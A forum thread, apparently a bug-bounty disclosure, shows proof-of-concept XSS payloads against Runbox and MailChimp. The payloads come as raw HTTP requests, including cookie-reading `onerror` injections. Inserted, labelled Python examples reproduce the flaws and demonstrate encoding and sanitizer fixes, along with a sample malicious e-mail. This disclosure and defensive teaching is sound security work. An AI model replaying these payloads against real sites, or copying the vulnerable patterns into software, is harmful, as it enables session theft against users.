[PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting)
#1

[Image: runbox_logo_bgwhite.png]
What is RunBox?
Runbox Solutions AS is a company that provides e-mail and web hosting services worldwide. Runbox Solutions was founded in March 2011 and is headquartered in Oslo, where the Runbox services were launched in 2000. Mainly employee-owned, Runbox Solutions works closely with, and is partially owned by, Copyleft Solutions AS.
Source: https://en.wikipedia.org/wiki/Runbox

[Image: rD0mPQd.png]

A very attractive message from the company, but when we take the time to look into the security... Having good encryption is useless if your secure mail service is not secure at all.

The flaw I want to show you today allowed me to inject malicious JavaScript into victims' browsers. It was possible for me to carry out a cross-site scripting attack when forwarding an email, due to the insecure email body.
This flaw was fixed in less than an hour; only the smaller vulnerabilities still work, but they will be fixed soon.

If a 'secure mailer' is hacked, the malicious JavaScript can get your mail content, your password, your session ID... even if your encryption is active while you read the mail, no one can stop a backdoored mail.

Today, there are four basic places where most people’s email can be compromised:

- On your device(s) (as shown on the screenshot below)
- On the networks
- On the server(s)
- On your recipient’s device(s)

On mobile:
[Image: A86w2WK.png]

[Image: UfNKKYq.png]

I compose my new mail, which contains the malicious JavaScript payload. The script will not be visible to the victim because it will be interpreted by the application during the transfer.

[Image: KQAbn57.png]

BAM! XSSED! All your data belong to me. [Image: ninja.gif]
The attacker may also use stealthy code instead of creating a cookie alert; in that case you will not see that you have been hacked.

So remember that choosing a secure mail service is very important; don't take the risk of having your privacy and your security compromised. Ask about the service you use before

And now here are a few cross-site scripting vulnerabilities found on the application:

[Image: hFJUB6c.png]

-Path: https://runbox.com/mail/addresses
-Vulnerable parameter: letter
-Payload: XSS
-Risk: low

PoC:
Code:
+------------------+
| [*]REFLECTED XSS |
+------------------+
https://runbox.com/mail/addresses?letter=%27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E
PROOF SCREEN: http://i.imgur.com/hFJUB6c.png
<td class="title" width="20%">Contacts &gt;  '\'\"&gt;<script>alert(1337)</script>' (0)</td>

[Image: LZpvS48.png]

-Path: https://runbox.com/files/fileslist.html
-Vulnerable parameter: new_folder
-Payload: XSS
-Risk: low

PoC:
Code:
+---------------+
| [*]STORED XSS |
+---------------+
POST: https://runbox.com/files/fileslist.html
Host: runbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://runbox.com/files/fileslist.html
Cookie: Runbox::AuthCookie_Runbox=854404:1434926232:6afead17cf4aaad9ed0ff7d62695dcd7:takara; mysessid=a10ce2c665e825292981c03ed7254ebb; backend=nfs5014
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 214
POST: fof=0&new_folder=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&create=%C2%A0Create%C2%A0&dir=0&drag_move=&execute=&order=&direction=&offset=&search=&winst=1434925685485&fontsize=&theme=_aero&current_folder_id=
PROOF SCREEN: http://i.imgur.com/LZpvS48.png

[Image: 56b9f63c6dfd46398d47614f929aec9f.png]

-Path: https://runbox.com/mail/addresses
-Vulnerable parameter: add_url
-Payload: XSS
-Risk: low

PoC:
Code:
POST: https://runbox.com/mail/addresses
Host: runbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://runbox.com/mail/addresses
Cookie: Runbox::AuthCookie_Runbox=854404:1434926639:22815a1c297fad39fc7e565828626784:takara; mysessid=a10ce2c665e825292981c03ed7254ebb; backend=nfs5014
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3434243525898
Content-Length: 2404
POST: -----------------------------3434243525898\r\n
Content-Disposition: form-data; name="new_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="delete_contact"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="delete_from_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="email_contact"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="save"\r\n
\r\n
Add\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_nick"\r\n
\r\n
Daisuke\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_first_name"\r\n
\r\n
Dan\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_last_name"\r\n
\r\n
test\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_email"\r\n
\r\n
test@mail.com\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_url"\r\n
\r\n
'"><img src=x onerror=prompt(document.cookie);>\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="order"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="cts_dir"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="to_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="move_contacts"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="og"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="s_field"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="contacts_s_string"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="winst"\r\n
\r\n
1434925685485\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="fontsize"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="theme"\r\n
\r\n
_aero\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="current_folder_id"\r\n
\r\n
\r\n
-----------------------------3434243525898--\r\n

PROOF SCREEN: http://i.prntscr.com/56b9f63c6dfd46398d47614f929aec9f.png

[Image: mailchimp_logo.png]

What is MailChimp?
MailChimp is an email marketing service provider, founded in 2001. It has 7 million users that collectively send over 10 billion emails through the service each month.
It is a web-based application, although data can be downloaded and for some features there is an offline application.
Source: https://en.wikipedia.org/wiki/MailChimp

[Image: e78f0d45599c421a96c08cd8957bcf20.png]

[Image: bf71eca5729c401cbfc3d888838775b0.png]

[Image: j3IsyRS.png]

Complete PoC:
Code:
XSS VULNERABILITIES

1) PATH: https://us11.admin.mailchimp.com/templates/#t:files-list
2) CREATE A NEW FOLDER >> ADD FOLDER
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/file/folders/create
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/templates/
Content-Length: 79
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.54.9.1434984312807; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=c07aa7e0f596dfe32edbdc68de7ee244918bfe78%3A1434986473%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434984148029&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: filter=&name=New%20Folder&__csrf_token=6a95f589a4013f913de60b4d7815d5282890aea6

PROOF SCREEN: http://i.prntscr.com/e78f0d45599c421a96c08cd8957bcf20.png

Another XSS

1) PATH: https://us11.admin.mailchimp.com/templates/save-template?id=58781
2) CREATE A TEMPLATE >> RENAME TEMPLATE NAME
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/templates/save-template?id=58781
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/templates/edit?id=58781
Content-Length: 85
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.58.9.1434985226172; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=9d3951aa388f9680459fea5079d21ccf7412c055%3A1434986690%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434984148029&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: name='%22%3E%3Ctitle%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1337)%3B%3E&type=overwrite
PROOF SCREEN: http://i.prntscr.com/bf71eca5729c401cbfc3d888838775b0.png

Another XSS

1) PATH: https://us11.admin.mailchimp.com/campaigns/folders/rename
2) CREATE A FOLDER >> RENAME
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/campaigns/folders/rename
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/campaigns/
Content-Length: 82
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.75.9.1434985468499; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=8e0c34847f6061abfabfb70911a0439dd3aac6c5%3A1434986961%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434985384865&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: filter=&id=1905&name='%22%3E&__csrf_token=6a95f589a4013f913de60b4d7815d5282890aea6
PROOF SCREEN: http://i.imgur.com/j3IsyRS.png

Here is a list of trusted mail services:
Code:
https://tutanota.com/
https://help.riseup.net/
https://www.hushmail.com/
https://countermail.com/
https://mail.ru/

Have a nice day! [Image: ninja.gif]
Reply
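The three Runbox findings above share one root cause: a request parameter (`letter`, `new_folder`, `add_url`) is written back into the page without output encoding. The Python below is an added example, not code from the original post or from Runbox. It reproduces the vulnerable interpolation with the payloads quoted above, fixes it with context-aware encoding (HTML text, quoted attribute, and URL attribute, where encoding alone is not enough because a `javascript:` link survives it), and includes the check a bug hunter would script to decide whether a payload came back as markup or as text. The template strings and function names are assumptions modelled on the `<td class="title">` line quoted in the post.

```python
"""Added example, not code from the original post or from Runbox.

The post quotes the vulnerable server output for the `letter` parameter:

    <td class="title" width="20%">Contacts &gt;  '...' (0)</td>

The functions below reproduce that pattern (raw string interpolation), fix it
with context-aware output encoding, and include the check a bounty hunter
would script: does the injected string come back as markup, or as text?
Templates and function names are assumptions; the payloads are the post's.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# URL quoted in the post; the payload is recovered from its query string.
REFLECTED_URL = ("https://runbox.com/mail/addresses?letter="
                 "%27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E")
REFLECTED_PAYLOAD = parse_qs(urlsplit(REFLECTED_URL).query)["letter"][0]
FOLDER_PAYLOAD = '"><img src=x onerror=prompt(1);>'                      # new_folder
CONTACT_URL_PAYLOAD = "'\"><img src=x onerror=prompt(document.cookie);>"  # add_url

# Assumed templates, modelled on the markup quoted in the post.
TITLE_TEMPLATE = '<td class="title" width="20%">Contacts &gt;  \'{letter}\' (0)</td>'
FOLDER_TEMPLATE = '<input type="text" name="new_folder" value="{name}">'
CONTACT_TEMPLATE = '<a href="{url}">{url}</a>'
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def render_title_unsafe(letter: str) -> str:
    """Vulnerable pattern: user input dropped straight into HTML text."""
    return TITLE_TEMPLATE.format(letter=letter)


def render_title_safe(letter: str) -> str:
    """Fix for the HTML text context: encode < > & " ' before interpolating."""
    return TITLE_TEMPLATE.format(letter=html.escape(letter, quote=True))


def render_folder_unsafe(name: str) -> str:
    """Vulnerable pattern: user input inside a quoted attribute, unencoded."""
    return FOLDER_TEMPLATE.format(name=name)


def render_folder_safe(name: str) -> str:
    """Fix for the attribute context: quote=True also encodes the closing quote."""
    return FOLDER_TEMPLATE.format(name=html.escape(name, quote=True))


def render_contact_url_safe(url: str) -> str:
    """A URL attribute needs two defences: encoding alone would still let a
    javascript:... value through as a clickable link, so check the scheme first."""
    if not url.strip().lower().startswith(SAFE_SCHEMES):
        url = "#"
    return CONTACT_TEMPLATE.format(url=html.escape(url, quote=True))


class _MarkupCollector(HTMLParser):
    """Records every start tag and every on* event-handler attribute seen."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.lower().startswith("on")]


def payload_survives(rendered: str, template_tags: tuple[str, ...]) -> bool:
    """True if the response contains tags beyond the template's own, or any
    on* handler: the injected string was parsed as markup, so the XSS fires."""
    collector = _MarkupCollector()
    collector.feed(rendered)
    collector.close()
    extra = [t for t in collector.tags if t not in template_tags]
    return bool(extra or collector.handlers)


if __name__ == "__main__":
    for label, rendered, tags in [
        ("reflected, unsafe", render_title_unsafe(REFLECTED_PAYLOAD), ("td",)),
        ("reflected, fixed", render_title_safe(REFLECTED_PAYLOAD), ("td",)),
        ("folder, unsafe", render_folder_unsafe(FOLDER_PAYLOAD), ("input",)),
        ("folder, fixed", render_folder_safe(FOLDER_PAYLOAD), ("input",)),
        ("contact url, fixed", render_contact_url_safe(CONTACT_URL_PAYLOAD), ("a",)),
    ]:
        print(f"{label:20s} fires={payload_survives(rendered, tags)}  {rendered}")
```

Two practical caveats. The `add_url` field is a URL, so it needs a scheme allowlist on top of encoding; `html.escape` leaves `javascript:prompt(1)` perfectly usable as an `href`. And the `prompt(document.cookie)` payloads can read the session cookie only because it is exposed to script; the `HttpOnly` flag on the session cookie stops that particular read (the captures show only the `Cookie` request header, not the `Set-Cookie` attributes, so whether it was set is not visible here), although injected script can still act on the victim's behalf from inside the page.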
#2
Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.
Reply
#3
(06-23-2015, 08:36 PM)Insider Wrote: Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.

Thanks
Fortunately I've been there, I saved their life, lol. It was a very dangerous flaw.
They offered me USD 300, USD 100 for each flaw.
In the case of Mailchimp, I tried to send malicious emails and it didn't work.
Reply
#4
(06-23-2015, 11:35 PM)Daisuke Dan Wrote:
(06-23-2015, 08:36 PM)Insider Wrote: Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.

Thanks
Fortunately I've been there, I saved their life, lol. It was a very dangerous flaw.
They offered me USD 300 , USD 100 for each flaw.
In the case of Mailchimp, I tried to send malicious emails and it didn't work.

Thanks for the article. Can you post some link or reference related to XSS in e-mail? I want to learn how it works.
Reply
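Post #1 says the script ran when the mail was forwarded, and post #4 asks how XSS through e-mail works. The Python below is an added example, not code from the thread, Runbox or MailChimp, showing the mechanism end to end: it builds an HTML e-mail carrying the payload quoted in post #1 (plus the other common vectors: an `on*` handler attribute, a `javascript:` link and an inline script), parses it the way a webmail backend would, and then either quotes the HTML part verbatim into the compose page (the vulnerable pattern) or passes it through an allowlist sanitizer first. The message, the allowlist and the sanitizer are constructed for this example; in production use a maintained sanitizer such as DOMPurify on the client, or an equivalent server-side library, rather than this minimal one.

```python
"""Added example, not code from the thread, Runbox or MailChimp.

Shows how a stored XSS rides inside an HTML e-mail: the HTML part is
untrusted input like any form field, and the forward/reply view that quotes
it into the page is the injection point. The sample message and the
allowlist are constructed for this example.
"""
import html
import re
from email import message_from_bytes
from email.message import EmailMessage
from email.policy import default
from html.parser import HTMLParser

# Assumed allowlist: formatting tags only, and only href on <a>.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote", "div", "span"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
# Test oracle for the demo: markup that would execute in a browser.
ACTIVE_CONTENT = re.compile(r"<script\b|\son[a-z]+\s*=|javascript:", re.I)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the fragment keeping only allowlisted tags and attributes.

    Dropped: <script>/<style> with their contents, unknown tags (their text
    survives, re-encoded), every on* handler, and href values whose scheme
    is not http, https or mailto.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self._muted = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._muted += 1
            return
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            value = value or ""
            if name == "href" and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._muted = max(0, self._muted - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._muted:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        return "".join(self.out)


def sanitize_html(fragment: str) -> str:
    sanitizer = AllowlistSanitizer()
    sanitizer.feed(fragment)
    sanitizer.close()
    return sanitizer.result()


def build_malicious_mail() -> bytes:
    """Constructed sample: multipart/alternative mail whose HTML part carries
    the post's payload plus a javascript: link, an on* handler and a script."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Invoice"
    msg.set_content("Please view this message in an HTML-capable client.")
    msg.add_alternative(
        "<p>Hello,</p>"
        '<p>Your invoice: <a href="javascript:prompt(document.cookie)">open</a></p>'
        "<img src=x onerror=prompt(document.cookie);>"
        "<script>alert(1337)</script>"
        '<p onmouseover="prompt(1)">Regards</p>',
        subtype="html",
    )
    return bytes(msg)


def html_body(raw_message: bytes) -> str:
    """What the webmail sees: the decoded text/html part (empty if none)."""
    msg = message_from_bytes(raw_message, policy=default)
    part = msg.get_body(preferencelist=("html",))
    return part.get_content() if part is not None else ""


def render_forward_unsafe(raw_message: bytes) -> str:
    """Vulnerable pattern: quote the original HTML verbatim into the compose page."""
    return "<blockquote>" + html_body(raw_message) + "</blockquote>"


def render_forward_safe(raw_message: bytes) -> str:
    """Fix: sanitize the untrusted HTML before it reaches the page."""
    return "<blockquote>" + sanitize_html(html_body(raw_message)) + "</blockquote>"


def has_active_content(rendered: str) -> bool:
    return ACTIVE_CONTENT.search(rendered) is not None


if __name__ == "__main__":
    raw = build_malicious_mail()
    print("unsafe:", render_forward_unsafe(raw))
    print("safe:  ", render_forward_safe(raw))
```

The point the reply asked about is in `html_body` and `render_forward_unsafe`: nothing in the mail transport executes the script; it runs the moment a webmail page inserts the decoded `text/html` part into its own DOM, and forwarding is simply one more page that does so. Encryption in transit or at rest does not change this, because the body is decrypted before it is rendered.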

